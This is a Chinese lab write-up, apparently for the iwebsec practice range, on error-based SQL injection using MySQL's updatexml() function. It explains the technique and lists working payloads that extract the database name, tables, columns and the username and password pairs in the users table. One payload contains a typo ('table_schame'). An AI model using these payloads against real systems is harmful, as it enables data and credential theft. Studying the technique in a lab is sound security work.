iwebsec-updatexml报错注入

原理分析

Updatexml()函数"updatexml(XML_document, XPath_string, new_value);"

参数 描述
XML_document String格式,为XML文档对象的名称,文中为Doc
XPath_string Xpath格式的字符串
new_value String格式,替换查找到的符合条件的数据

即sql语句为"select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1"

concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出用户

0x7eASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞,添加and 1=1# 页面正常回显,and 1=2# 页面回显异常,即存在sql注入漏洞

2.爆出数据库

复制代码
id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#
相关推荐
阿里云大数据AI技术13 小时前
用 SQL 调大模型?Hologres + 百炼,让数据开发直接“对话”AI
sql·llm
tryCbest6 天前
数据库SQL学习
数据库·sql
cowboy2586 天前
mysql5.7及以下版本查询所有后代值(包括本身)
数据库·sql
一名优秀的码农6 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp6 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp6 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
麦聪聊数据6 天前
统一 Web SQL 平台如何收编企业内部的“野生数据看板”?
数据库·sql·低代码·微服务·架构
山峰哥6 天前
吃透 SQL 优化:告别慢查询,解锁数据库高性能
服务器·数据库·sql·oracle·性能优化·编辑器
岛屿旅人6 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
轩情吖6 天前
MySQL初识
android·数据库·sql·mysql·adb·存储引擎